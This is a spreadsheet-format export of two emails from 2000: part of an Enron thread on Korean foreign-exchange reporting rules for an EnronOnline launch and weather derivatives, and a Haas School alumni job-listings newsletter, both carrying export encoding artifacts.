Hyundai Oil  cares about the reporting.   The Bank of Korea does not insist _x000D_
on reviewing the report prior to the transaction and does not care even if _x000D_
the report is made even 1 or 2 weeks later.   That's why sometimes it takes a _x000D_
week for the Bank of Korea to return the report with its seal on it.   The _x000D_
Bank of Korea said that normally it takes less than one hour to review and _x000D_
place its seal on a one-page report. _x000D_
_x000D_
Regarding the Weather Derivatives, there is an issue whether Weather _x000D_
Derivatives will be classified as a Commodity Derivative or a Financial _x000D_
Derivative since Korea has no experience with such a product.   In the FETR, _x000D_
there is a general definition of the "Derivative Transaction".   No separate _x000D_
definition of the "Commodity Derivatives" or "Financial Derivatives".    _x000D_
However, the FETR treats the Derivative Transaction whose underlying products _x000D_
are commodity products like grains and metals differently from the Derivative _x000D_
Transaction whose underlying products are financial products like interest _x000D_
payments and foreign currencies.   For convenience' sake, I would call the _x000D_
former the "Commodity Derivative" and the latter the "Financial _x000D_
Derivative".    The FETR stipulates that a prior report to the Bank of Korea _x000D_
is required for the Derivative Transaction whose underlying assets are not _x000D_
financial products (i.e., Commodity Derivative by our own definition) and _x000D_
that a prior approval of the Bank of Korea is required for the Derivative _x000D_
Transaction whose underlying assets are financial products (Financial _x000D_
Derivative by our definition) "among non-banking residents or between _x000D_
non-banking resident and non-resident".   No approval or report is required _x000D_
for the Financial Derivative Transaction if a banking institution is _x000D_
involved.    When I talked to the Int'l Finance Dept. of the Bank of Korea, _x000D_
which is responsible for the prior report and approval, they informally _x000D_
indicated that the underlying asset of the Weather Derivatives doesn't seem _x000D_
to be a financial product.  They said that they would need better _x000D_
understanding of the Weather Derivatives in order to determine that formally._x000D_
_x000D_
I hope that Matt's note and the above information are useful for all of you _x000D_
to understand the legal situation better.  Let's discuss and clarify these _x000D_
issues in our conference call.  Thanks._x000D_
_x000D_
Regards,_x000D_
Jae-Moo_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Matthias Lee@ECT_x000D_
08/24/2000 08:22 PM_x000D_
To: Jae-Moo Lee/Corp/Enron@ENRON_x000D_
cc: Christopher B Hunt/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Joseph P _x000D_
Hirl/AP/ENRON@ENRON, David Forster/Corp/Enron@Enron, John _x000D_
Ambler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Mike _x000D_
Dahlke/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Bruce _x000D_
Lundstrom/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Alan _x000D_
Aronowitz/HOU/ECT@ECT, Mike Brown/ENRON@Gateway@ENRON, Justin _x000D_
Timothy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Paul _x000D_
Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Raymond _x000D_
Yeow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, John _x000D_
Viverito/Corp/Enron@Enron, Rousseau Anai/AP/Enron@Enron, John _x000D_
Chismar/SIN/ECT@ECT, Victor Santos/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, _x000D_
Li Yin Lim/SIN/ECT@ECT, Mark Taylor/HOU/ECT@ECT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Jonathan _x000D_
Whitehead/AP/Enron@Enron, Michelle Lee/Corp/Enron@Enron, Ann _x000D_
Brown/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Matthias Lee/SIN/ECT@ECT, _x000D_
Angeline Poon/SIN/ECT@ECT _x000D_
_x000D_
Subject: Re: EOL Korea  _x000D_
_x000D_
Jae-Moo_x000D_
_x000D_
On the section of Regulatory/Legal Environment, it may be useful to note:_x000D_
_x000D_
1. There is no official rule or regulation that ex post facto reporting for _x000D_
Commodity Derivatives are acceptable to the Bank of Korea, although your and _x000D_
Korean external lawyer's (Kim &amp; Chang) informal verbal enquiries with the _x000D_
Bank of Korea have suggested they have accepted some  7 or 8 reports since _x000D_
April last year (all from Hyundai Oil)._x000D_
_x000D_
2. The Bank of Korea take up to two weeks to review the reports and, as Kim &amp; _x000D_
Chang has advised, there remains a possibility that the Bank of Korea may _x000D_
reject the report, although they were not able to advise the grounds on which _x000D_
a report may be rejected._x000D_
_x000D_
3. Although, a foreign counterparty need not file a report or seek approval, _x000D_
the Korean counterparty must still do so for the benefit and interest of the _x000D_
foreign counterparty. Kim &amp; Chang advised that where reporting or approval is _x000D_
required but is not made or obtained, the Korean counterparty would not be _x000D_
able to remit its payments under the transaction. This would clearly impact _x000D_
on the settlement of the transaction, in particular shorter term deals since _x000D_
reporting and approval may take several weeks. _x000D_
_x000D_
4. The Supreme Court of Korea has ruled that a foreign exchange authorization _x000D_
that was originally required should be obtained in order for a foreign party _x000D_
to execute any judgment against the Korean party and remit the proceeds. _x000D_
_x000D_
Regards_x000D_
Matt_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jae-Moo Lee@ENRON_x000D_
08/24/2000 04:58 PM_x000D_
To: Christopher B Hunt/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Joseph P _x000D_
Hirl/AP/ENRON@ENRON, David Forster/Corp/Enron@Enron, John _x000D_
Ambler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mike _x000D_
Dahlke/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bruce _x000D_
Lundstrom/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Alan Aronowitz/HOU/ECT@ECT, _x000D_
Mike Brown/ENRON@Gateway, Justin Timothy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Paul Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Raymond _x000D_
Yeow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Viverito/Corp/Enron@Enron, _x000D_
Rousseau Anai/AP/Enron@Enron, John Chismar/SIN/ECT@ECT, Victor _x000D_
Santos/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Li Yin Lim/SIN/ECT@ECT, Mark _x000D_
Taylor/HOU/ECT@ECT, Matthias Lee/SIN/ECT@ECT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jonathan Whitehead/AP/Enron@Enron_x000D_
cc: Michelle Lee/Corp/Enron@Enron, Ann _x000D_
Brown/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: EOL Korea_x000D_
_x000D_
As many of you are aware, over the past few months we have been investigating _x000D_
whether or not it would make sense to seriously consider an EOL launch in _x000D_
Korea from a market, regulatory and legal perspective.  The primary interest _x000D_
has been on reviewing whether or not we could launch existing products in _x000D_
Korea (e.g., products already handled by Singapore EOL) as well as new _x000D_
products (e.g., Seoul weather). _x000D_
_x000D_
This initial work was directed primarily by the Korea team working within the _x000D_
APACHI group.  If a launch is to progress much further from this point, _x000D_
however, substantial attention by the EOL team would be required.  To _x000D_
facilitate this, the attached presentation summarizes our primary findings to _x000D_
date and some of our thoughts.  We would appreciate your taking a look at the _x000D_
attached document._x000D_
_x000D_
We would like to arrange a conference call for next Thursday (Aug. 31st) at _x000D_
6:00 pm by Houston time (Friday at 8:00 am by Tokyo time) to discuss the _x000D_
attached document and to solicit thoughts as to next steps.  Please let me _x000D_
know whether you will be able to join this call or, if you have a conflict, _x000D_
an alternative time.  Your participation will be greatly appreciated.  _x000D_
_x000D_
Best regards,_x000D_
_x000D_
Jae-Moo_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 09:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'owner-alumnijobs@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>Jobs for Haas Alumni 11/9/00</t>
  </si>
  <si>
    <t xml:space="preserve">JOBS FOR HAAS ALUMNI_x000D_
_x000D_
_x000D_
Welcome to the Alumni jobs weekly email announcement. The companies listed_x000D_
below have come to us seeking the caliber and talent of professionals we_x000D_
are all proud to be associated with and to have as alumni of the Haas_x000D_
School. Please also consider listing your own company's job openings._x000D_
Submit all job openings to: recruitalumni@haas.berkeley.edu . Please be_x000D_
sure and include Location, Title, Company, Degree, and contact information._x000D_
Feel free to tell your peers and colleagues about this great opportunity to_x000D_
post a job that reaches some of the brightest and best talent in the world._x000D_
_x000D_
If you need assistance in your job search you can utilize the services of_x000D_
the Haas Alumni Career Advisor for more information contact_x000D_
morel@haas.berkeley.edu_x000D_
_x000D_
THIS SPECIAL ALUMNI COMMUNICATION IS BROUGHT TO YOU, IN PART, BY SUPPORT_x000D_
FROM THE HAAS SCHOOL ANNUAL FUND. http://www.haas.berkeley.edu/alumni/_x000D_
_x000D_
----------------------------_x000D_
1._x000D_
LOCATION: Dallas, Texas_x000D_
_x000D_
TITLE: CEO_x000D_
_x000D_
COMPANY: not available_x000D_
_x000D_
DEGREE: At least five (5) years of full P&amp;L responsibility.  MBA a strong=_x000D_
=20_x000D_
plus._x000D_
_x000D_
---------------------------_x000D_
2._x000D_
LOCATION: Austin, Texas_x000D_
_x000D_
TITLE: SVP/ General Manager-$8 billion Global Business Unit_x000D_
_x000D_
COMPANY: not available_x000D_
_x000D_
DEGREE: A minimum of ten years experience in executive general management_x000D_
with strong strategic planning, relationship sales &amp; marketing, product_x000D_
development and financial acumen. MBA a strong plus._x000D_
----------------------------_x000D_
3._x000D_
LOCATION: Chicago, Illinois_x000D_
_x000D_
TITLE: Chief Information Officer_x000D_
_x000D_
COMPANY: not available_x000D_
_x000D_
DEGREE: n/a_x000D_
_x000D_
-----------------------------_x000D_
4._x000D_
LOCATION: Santa Clara, CA_x000D_
_x000D_
TITLE: Business Manager/Staff Assistant to the VP of a Product Business Gro=_x000D_
up_x000D_
_x000D_
COMPANY: Applied Materials_x000D_
_x000D_
DEGREE: MBA_x000D_
-----------------------------_x000D_
_x000D_
November 11, 2000_x000D_
All Day Pacific Time_x000D_
Women in Leadership Conference_x000D_
_x000D_
"Options on Your Future"_x000D_
Sponsored by Fortune Magazine_x000D_
_x000D_
Keynote Speakers:_x000D_
Pat House, Co-Founder and Executive Vice President, Siebel Systems, Inc._x000D_
Judith Lichtman, President of the National Partnership for Women &amp; Familes_x000D_
_x000D_
Plus 15 panels!_x000D_
_x000D_
Contact and Phone Tiffany Liu: tliu@haas.berkeley.edu or Emily Stauffer:_x000D_
stauffer@haas.berkeley.edu_x000D_
Posted By Becky Frank_x000D_
Location Haas School of Business, University of California, Berkeley_x000D_
_x000D_
_x000D_
-----------------------------_x000D_
5._x000D_
LOCATION: San Diego, CA_x000D_
_x000D_
TITLE: Project Manager/Developer  in Nonprofit/Housing Industry_x000D_
_x000D_
COMPANY: BRIDGE Housing Corporation_x000D_
_x000D_
DEGREE: MBA desirable_x000D_
_x000D_
-----------------------------_x000D_
6._x000D_
LOCATION: San Francisco, CA_x000D_
_x000D_
TITLE: Administrative Director/Chief Financial Officer for_x000D_
Nonprofit/Advocacy Industry in Finance &amp; Administration_x000D_
_x000D_
COMPANY: Public Advocates, Inc._x000D_
_x000D_
DEGREE: Business degree._x000D_
_x000D_
----------------------------_x000D_
7._x000D_
LOCATION: Orinda, CA_x000D_
_x000D_
TITLE: Strategy Engineer_x000D_
_x000D_
COMPANY: AXA Rosenberg Investment Management_x000D_
_x000D_
DEGREE: MBA in Finance_x000D_
_x000D_
--------------------------_x000D_
8._x000D_
LOCATION: Orinda, California (San Francisco Bay Area)_x000D_
_x000D_
TITLE: MARKET NEUTRAL ANALYST_x000D_
_x000D_
COMPANY: AXA Rosenberg Investment Management_x000D_
_x000D_
DEGREE: Master's degree in Business Administration, Economics, Finance, or_x000D_
related field_x000D_
_x000D_
---------------------------_x000D_
9._x000D_
LOCATION: Burlingame, CA_x000D_
_x000D_
TITLE: Internet Strategists (10), Director of Engineering, PERL Programmers_x000D_
(4+), Business Systems Programmer, Telebusiness Representatives (2+),_x000D_
Product Development, Marketing, Sales Operations Manager_x000D_
_x000D_
COMPANY: NetCurrents_x000D_
_x000D_
DEGREE: varied_x000D_
-------------------------_x000D_
How Are We Doing?_x000D_
Sound off through the Haas Alumni Network online_x000D_
survey about our events, online services, and_x000D_
programs. It's your network. Help us make it work for_x000D_
you._x000D_
http://www.haas.berkeley.edu/alumni/index.html_x000D_
_x000D_
-------------------------_x000D_
10._x000D_
LOCATION: Redwood City, CA_x000D_
_x000D_
TITLE: Contracts Manager_x000D_
_x000D_
COMPANY: SmartForce, formerly CBT Systems USA Ltd_x000D_
_x000D_
DEGREE: BA/BS degree desired_x000D_
_x000D_
--------------------------_x000D_
11._x000D_
LOCATION: Southwest_x000D_
_x000D_
TITLE: Corporate Development GroupAll levels_x000D_
_x000D_
COMPANY: Foster McKay Group_x000D_
_x000D_
DEGREE: MBA/years work experience interchangeable_x000D_
--------------------------_x000D_
12._x000D_
LOCATION: NYC_x000D_
_x000D_
TITLE: SVP e-Business Strategy_x000D_
_x000D_
COMPANY: McGraw Hill Companies_x000D_
_x000D_
DEGREE: Varied_x000D_
----------------------------_x000D_
13._x000D_
LOCATION: San Mateo, CA_x000D_
_x000D_
TITLE: Channel Marketing Manager and Product Marketing Manager_x000D_
_x000D_
COMPANY: Vividence_x000D_
_x000D_
DEGREE: A bachelor's degree is required. MBA preferred. MBA grads with_x000D_
consulting or marketing backgrounds._x000D_
-------------------------------_x000D_
14._x000D_
LOCATION: San Francisco, CA_x000D_
_x000D_
TITLE: Department Manager_x000D_
_x000D_
COMPANY: University of California, San Francisco - Department of Physical_x000D_
Therapy and Rehabilitation Science_x000D_
_x000D_
DEGREE: Masters degree in business, public administration, or related field_x000D_
is preferred and at least five years of progressively responsible_x000D_
administration experience, or an equivalent combination of education and_x000D_
experience._x000D_
------------------------------_x000D_
_x000D_
Big Game Bar-B-Que -- November 18, 2000_x000D_
_x000D_
Haas School Courtyard - Register Online_x000D_
BBQ food and refreshments before the Cal vs. Stanford football game._x000D_
Thanks to Pyramid Brewery for donating the beer!_x000D_
_x000D_
------------------------------_x000D_
15._x000D_
LOCATION: reports to a marketing manager out of Corvallis,_x000D_
Oregon, it is negotiable within the western region._x000D_
_x000D_
TITLE: Go-To-Market Customer Communication Manager_x000D_
_x000D_
COMPANY: Hewlett Packard_x000D_
_x000D_
DEGREE: MBA in marketing desirable_x000D_
-----------------------------_x000D_
16._x000D_
LOCATION: Santa Clara, CA_x000D_
_x000D_
TITLE: Out-sourced lead generator for a marketing project_x000D_
_x000D_
COMPANY: BCL Computers_x000D_
_x000D_
DEGREE: na_x000D_
-----------------------------_x000D_
17._x000D_
LOCATION: Los Angeles, CA_x000D_
_x000D_
TITLE: Equity Research Associate - Technology_x000D_
_x000D_
COMPANY: Wedbush Morgan Securities_x000D_
_x000D_
DEGREE: MBA required_x000D_
-----------------------------_x000D_
18._x000D_
LOCATION: San Leandro, CA_x000D_
_x000D_
TITLE: CPA-Tax_x000D_
_x000D_
COMPANY: not available_x000D_
_x000D_
DEGREE: CPA_x000D_
------------------------------_x000D_
19._x000D_
LOCATION: San Ramon, California  /  San Bruno, California_x000D_
_x000D_
TITLE: Financial Consultant_x000D_
_x000D_
COMPANY: Aetna US Healthcare_x000D_
_x000D_
DEGREE: Degree in Finance, Economics,  Actuarial Science or Healthcare_x000D_
Administration preferred._x000D_
-----------------------------_x000D_
20._x000D_
LOCATION: Emeryville, CA_x000D_
_x000D_
TITLE: Competitive Analyst, Product Manager, Product Marketing Manager in_x000D_
Procurement, Implementation Manager for PSO, Principal Consultant_x000D_
(Emeryville, CA &amp; Parsippany, NJ)_x000D_
_x000D_
COMPANY: Extensity, Inc._x000D_
_x000D_
DEGREE: Varies_x000D_
------------------------------_x000D_
_x000D_
EXPANDED POSTINGS_x000D_
_x000D_
------------------------_x000D_
1._x000D_
LOCATION: Dallas, Texas_x000D_
_x000D_
TITLE: CEO_x000D_
_x000D_
COMPANY: not available_x000D_
_x000D_
DEGREE: At least five (5) years of full P&amp;L responsibility.  MBA a strong=_x000D_
=20_x000D_
plus._x000D_
_x000D_
_x000D_
Description:_x000D_
The company is a facilities-based enabler and service provider using the_x000D_
most advanced fixed optical wireless laser technology available to solve_x000D_
the =01&amp;last-mile=018 problem faced by businesses today requiring_x000D_
multi-megabit-per-second metropolitan access for bandwidth-intensive_x000D_
applications.  The company=01,s primary target customers are businesses wit=_x000D_
hin_x000D_
a shared or single tenant office environment.  Initially, the company is_x000D_
focusing on carriers who are targeting small to medium-sized businesses_x000D_
with high-speed bandwidth service in commercial building/park environments_x000D_
and are searching for solutions to bridge the last mile._x000D_
The CEO will be responsible for further refinement of the company=01,s mark=_x000D_
et_x000D_
and product strategies to aggressively grow the business while building the_x000D_
organization and driving revenue.  Individual will have full P&amp;L_x000D_
responsibility including all operations, scaling the company, providing_x000D_
vision and strategy to further define the business plan and market_x000D_
opportunity as well as providing the leadership that will establish the_x000D_
company=01,s market position.  The Chief Executive Officer will be tasked i=_x000D_
n_x000D_
identifying ways to attract and retain customers while anticipating and_x000D_
embracing inevitable change in the business model and the competitive_x000D_
landscape. The Chief Executive Officer will be responsible for establishing_x000D_
the strategy for the building and deployment of networks to support the_x000D_
aggressive nationwide growth profile targeted over the next 12 to 24 months=_x000D_
._x000D_
The successful candidate will have a successful track record of_x000D_
progressive, operational and leadership experience with at least five (5)_x000D_
years of full P&amp;L responsibility.  Demonstration of sustained success, as_x000D_
evidenced by profitable growth, as the leader of a significant_x000D_
business.  Aptitude in telecommunications and networks is_x000D_
essential.  Direct experience with CLECs, BLECs and ISPs or cable company_x000D_
is highly desirable.  A proven track record in building a network_x000D_
operations capability, with demonstrated experience at a greenfield_x000D_
level.  Understanding of the legislative landscape as it pertains to_x000D_
building/operating networks.  Undergraduate degree required.  An advanced_x000D_
degree, especially an M.B.A., would be a strong plus._x000D_
Please submit resumes for consideration via e-mail as a Word attachment to_x000D_
pettetar@tmp.com. Please reference the job title in your e-mail._x000D_
------------------------_x000D_
2._x000D_
LOCATION: Austin, Texas_x000D_
_x000D_
TITLE: SVP/ General Manager-$8 billion Global Business Unit_x000D_
_x000D_
COMPANY: not available_x000D_
_x000D_
DEGREE: A minimum of ten years experience in executive general management_x000D_
with strong strategic planning, relationship sales &amp; marketing, product_x000D_
development and financial acumen. MBA a strong plus._x000D_
_x000D_
Description:_x000D_
The company is a $26 billion technology company which is number one or_x000D_
number two in every market served.  The company consistently receives_x000D_
industry awards including =01&amp;best of breed=018 for in Fortune magazine=01,=_x000D_
s first_x000D_
Reader=01,s Choice Award for Personal Service and Reliability. Recently,_x000D_
Fortune magazine also listed the company as one of America=01,s most admire=_x000D_
d_x000D_
companies.  Additionally, the company is consistently rated =01&amp;number one=_x000D_
=018 in_x000D_
customer satisfaction by several key industry surveys._x000D_
The SVP, General Manager will have responsibility for a fully integrated,_x000D_
global P&amp;L for the $8 billion Commercial business.  The SVP will be_x000D_
responsible for the overall development, management, execution and_x000D_
profitability of this business while developing and executing a business_x000D_
strategy to further expand the company=01,s penetration of the customer_x000D_
base.  Primary focus will be on expanding the company=01,s opportunity to s=_x000D_
ell_x000D_
servers as well as Internet infrastructure and enabling technologies and_x000D_
related services. Additionally, the SVP will have frequent interface with_x000D_
the Chairman / CEO as well as build strong relationships across the_x000D_
organization, and with vendors, key customers and strategic partners._x000D_
The successful candidate will have a minimum of ten years experience in_x000D_
executive general management with strong strategic planning, relationship_x000D_
sales &amp; marketing, product development and financial acumen.  The candidate_x000D_
should have the potential to metamorphosize to the CEO of a stand-alone_x000D_
company. Broad, functional exposure and expertise demonstrated by a track_x000D_
record of having sat in several different functional chairs and_x000D_
multi-discipline acumen. Substantial P&amp;L responsibility within a_x000D_
hyper-growth environment. Candidates with strong consulting management_x000D_
background will be given full Consideration.  Undergraduate degree_x000D_
required.  An advanced degree, especially an M.B.A., would be a strong plus=_x000D_
._x000D_
_x000D_
Please submit resumes for consideration via e-mail as a Word attachment to_x000D_
austinopps@tmp.com. Please reference the job title in your e-mail._x000D_
_x000D_
------------------------_x000D_
3._x000D_
LOCATION: Chicago, Illinois_x000D_
_x000D_
TITLE: Chief Information Officer_x000D_
_x000D_
COMPANY: not available_x000D_
_x000D_
DEGREE: n/a_x000D_
_x000D_
The Company is a $3.5 Billion global product manufacturer of ride control_x000D_
and exhaust systems and products.  The Company places its products on all_x000D_
ten of the best-selling light trucks in North America; both of its exhaust_x000D_
and ride control products are on all three of the best-selling vehicles in_x000D_
the world, and one or both products are on 11 of the top 15 best-selling_x000D_
vehicles in the world.  In the global aftermarket, the Company products_x000D_
nearly 3 of every 10 mufflers and almost half of all shock absorbers_x000D_
installed on vehicles._x000D_
The successful candidate will have a minimum of ten years of diversified_x000D_
information systems management experience in a complex environment, with_x000D_
direct technical and management experience in systems development and_x000D_
project management.  This should include distributed systems, with five or_x000D_
more years heading a global information technology_x000D_
organization.  Additionally, this individual will possess strong leadership_x000D_
skills coupled with good business acumen and the ability to sell new_x000D_
systems development concepts to the organization and deliver these products_x000D_
to users in a timely manner.  A demonstrated ability and success in leading_x000D_
business process engineering and/or redesign projects leveraging_x000D_
technology, including experience in merging data centers from acquired_x000D_
companies and on a global basis is essential._x000D_
This executive will act as an information systems resource to senior_x000D_
management on new products and services while benchmarking with the_x000D_
industry best practice organizations to ensure the Company maintains a_x000D_
leading edge in its information systems support.  This individual will also_x000D_
provide a strong understanding of the =01&amp;best-of-class=018 in state-of-the=_x000D_
-art_x000D_
manufacturing and logistics systems.  The CIO will team with his/her_x000D_
business peers to leverage IT developments to create IT enabled business_x000D_
strategies that offer a competitive advantage for the company._x000D_
The Chief Information Officer will be responsible for fostering people_x000D_
development, mentoring, and promoting an environment of team cohesion and_x000D_
empowered decision making with a minimum of ten years of diversified_x000D_
information systems management experience in a complex environment, with_x000D_
direct technical and management experience in systems development and_x000D_
project management._x000D_
Compensation:_x000D_
A competitive package consisting of base salary, annual, and long-term_x000D_
incentives will be available to attract outstanding talent._x000D_
_x000D_
Submit Resumes:_x000D_
_x000D_
Individuals meeting the above criteria are encouraged to send their resume_x000D_
via email as a Word attachment to TopJobs@tmp.com, referencing # 31-47 in_x000D_
the subject line, for consideration._x000D_
_x000D_
------------------------_x000D_
4._x000D_
LOCATION: Santa Clara, CA_x000D_
_x000D_
TITLE: Business Manager/Staff Assistant to the VP of a Product Business Gro=_x000D_
up_x000D_
_x000D_
COMPANY: Applied Materials_x000D_
_x000D_
DEGREE: MBA_x000D_
_x000D_
Company Information:_x000D_
Applied Materials is a Fortune 500 global growth company. As the world$B!G(=_x000D_
Bs_x000D_
largest producer of wafer fabrication systems and services to the worldwide_x000D_
semiconductor industry, Applied Materials makes leading-edge systems for_x000D_
chemical vapor deposition (CVD), physical vapor deposition (PVD), epitaxial=_x000D_
=20_x000D_
and_x000D_
polysilicon deposition, plasma etching, thermal processing, ion_x000D_
implantation and_x000D_
chemical mechanical polishing (CMP)._x000D_
Responsibilities:_x000D_
Staff Assistant to the Vice President/General Manager of an Applied Materia=_x000D_
ls_x000D_
Product Business Group. Responsible for assisting the Vice President in_x000D_
_x000D_
managing the business. Track and followup on all major action items. Develo=_x000D_
p_x000D_
organization communications and presentations. Complete special assignments=_x000D_
 at_x000D_
the request of the Vice President/General Manager. May temporarily manage_x000D_
organizations for the Product Business Group if the need arises._x000D_
Requirements: (5-7 Lines of KEY requirements)_x000D_
Ideal candidate will have an MBA from a top program, with an undergraduate_x000D_
degree in engineering, physics, or chemistry and 4+ years engineering_x000D_
experience. Must have program/project management experience. In addition,_x000D_
candidate must have excellent interpersonal, oral and written_x000D_
communication, and_x000D_
computer skills. Must be a self starter with excellent leadership skills._x000D_
Contact me if there are any questions._x000D_
Sarah Kastelic_x000D_
Program Coordinator_x000D_
College Programs_x000D_
3195 Kifer Road, M/S 2963_x000D_
Santa Clara, CA 95051_x000D_
Ph: 1-800-538-9363 ext. 56403_x000D_
Fax: 408-563-7743_x000D_
Email: Sarah_Kastelic@amat.com_x000D_
_x000D_
------------------------_x000D_
5._x000D_
LOCATION: San Diego, CA_x000D_
_x000D_
TITLE: Project Manager/Developer  in Nonprofit/Housing Industry_x000D_
_x000D_
COMPANY: BRIDGE Housing Corporation_x000D_
_x000D_
DEGREE: MBA desirable_x000D_
_x000D_
_x000D_
Organization Description_x000D_
BRIDGE Housing Corporation is one of California=01,s largest non-profit_x000D_
housing developers, with over 8,000 housing units in its portfolio. The_x000D_
company is involved in the development of large-scale rental and ownership_x000D_
complexes in both urban infill and urban fringe locations, all of which_x000D_
contain a significant proportion of units that are affordable to low- and_x000D_
moderate-income households. Mixed income, 100% affordable, and mixed-use_x000D_
developments are all part of the company=01,s portfolio.  For more_x000D_
information: www.bridgehousing.com._x000D_
Job Description_x000D_
BRIDGE seeks qualified individuals to fill a Project Manager position in_x000D_
its San Diego office. This person will manage all aspects of the_x000D_
development process, from site acquisition and project conception through_x000D_
construction completion and lease-up._x000D_
Qualifications_x000D_
?       Master=01,s degree desirable_x000D_
?       Two or more years of on-the-job experience in the development of_x000D_
multi-family housing_x000D_
?       Experience in all phases of the new construction development_x000D_
process and the use of low income housing tax credits preferred_x000D_
?       Able to work independently while also contributing to a team_x000D_
environment_x000D_
?       Financing expertise_x000D_
?       Interpersonal skills_x000D_
_x000D_
To Apply_x000D_
Send resume and cover letter to:_x000D_
BRIDGE Housing Corporation_x000D_
Attn: L. Sao Pedro (MNC-574)_x000D_
One Hawthorne St., Suite 400_x000D_
San Francisco, CA  94105_x000D_
E-mail: lsaopedro@bridgehousing.com_x000D_
_x000D_
------------------------_x000D_
6._x000D_
LOCATION: San Francisco, CA_x000D_
_x000D_
TITLE: Administrative Director/Chief Financial Officer for_x000D_
Nonprofit/Advocacy Industry in Finance &amp; Administration_x000D_
_x000D_
COMPANY: Public Advocates, Inc._x000D_
_x000D_
DEGREE: Business degree._x000D_
_x000D_
_x000D_
Organization Description_x000D_
Public Advocates is one of the oldest public interest law firms in the_x000D_
nation. Throughout its history, the firm's purpose has been to challenge_x000D_
the persistent, underlying causes and effects of poverty and discrimination_x000D_
and to work for the empowerment of people of color, providing them a voice_x000D_
in governmental, corporate and other institutions. Its current efforts_x000D_
focus on education, health care, telecommunications, employment, community_x000D_
economic development and insurance redlining. We are a casual but busy_x000D_
office located near MUNI and the Civic Center BART._x000D_
Job Description_x000D_
The Administrative Director is responsible for overseeing the daily_x000D_
administrative operations of an office of 10 employees, including human_x000D_
resources (employee salaries and benefits, supervision and evaluation of_x000D_
support staff, and personnel policies), operations of the office, and_x000D_
maintenance of the facilities. The Administrative Director, with the help_x000D_
of a bookkeeper, will also be responsible for the finances of the_x000D_
organization, with oversight responsibilities for budgets, financial_x000D_
statements, audits, tax filings, lobbying reports, and investments._x000D_
Qualifications_x000D_
?       Degree in business administration or related field_x000D_
?       Minimum of five years of relevant work experience_x000D_
?       Substantial accounting education and experience preferred,_x000D_
including work with budgets and financial statements_x000D_
?       Nonprofit experience desirable_x000D_
?       Strong leadership and personal skills_x000D_
?       Commitment to mission of the organization_x000D_
Compensation_x000D_
Salary: $50-70K, DOE.  Excellent benefits._x000D_
To Apply_x000D_
Send cover letter, resume, and references as soon as possible to:_x000D_
_x000D_
Margie Chung (MNC-575)_x000D_
Public Advocates, Inc._x000D_
1535 Mission St._x000D_
San Francisco, CA 94103_x000D_
Fax: 415-431-1048_x000D_
E-mail: mchung@publicadvocates.org_x000D_
_x000D_
------------------------_x000D_
7._x000D_
LOCATION: Orinda, CA_x000D_
_x000D_
TITLE: Strategy Engineer_x000D_
_x000D_
COMPANY: AXA Rosenberg Investment Management_x000D_
_x000D_
DEGREE: MBA in Finance_x000D_
_x000D_
Position Description: Strategy Engineers are part of the institutional_x000D_
investment account management team structure at AXA Rosenberg Investment_x000D_
Management that includes Portfolio Engineers, Client Service Liaisons, and_x000D_
Operations.  Strategy engineers are responsible for the mechanics of our_x000D_
investment process as it pertains to the individual strategies managed by_x000D_
the firm.  Specifically responsibilities would include:_x000D_
1. Monitoring and implementing client guidelines._x000D_
2. Monitoring capital actions, tenders, proxy voting, bankruptcies and_x000D_
other "special situations"._x000D_
3. Monitoring risk exposures._x000D_
4. Facilitating account transitions._x000D_
5. Monitoring the inputs to, and outputs of, the models for our portfolios._x000D_
6. Monitoring market trends and our model's response to them._x000D_
Often times the strategy engineers will develop and modify tools designed_x000D_
to support changes/enhancements of investment process, particularly new_x000D_
strategies._x000D_
Experience:     The candidate will have experience role in the investment_x000D_
management or investment consulting industry. A strong understanding of_x000D_
quantitative portfolio management concepts is essential to successful_x000D_
client communications._x000D_
Skills Required:The position requires excellent communication skills that_x000D_
include clear analytical writing, presentations at senior levels, and the_x000D_
ability to =01&amp;think on your feet=018.  Self-direction and the ability to w=_x000D_
ork_x000D_
independently are also important skills. Since much of the work requires_x000D_
assembling and manipulating data, the position requires an intermediate to_x000D_
advanced level of proficiency in the use of MS Office applications,_x000D_
particularly Excel, Powerpoint._x000D_
_x000D_
Programming: Strong programming skills are desirable (C, Fortran, Eiffel,_x000D_
SQL, MS Access)_x000D_
_x000D_
Education:      . Exposure to econometrics. CFA Level II (minimum)_x000D_
preferred. Individuals without a CFA should be willing to attain the_x000D_
designation._x000D_
_x000D_
Salary and Benefits:    Excellent salary and benefits. Pleasant work_x000D_
environment._x000D_
_x000D_
Discussion:     This position will appeal to individuals who are_x000D_
detail-oriented, organized and able to work well to deadlines. Much of the_x000D_
communication with clients, both written and oral, involves the_x000D_
interpretation of complex quantitative concepts._x000D_
Contact: Send resume to Carolyn Demler, Recruiting Coordinator, by fax_x000D_
925.253.0141 or email cdemler@axarosenberg.com.  AXA Rosenberg is an Equal_x000D_
Opportunity Employer._x000D_
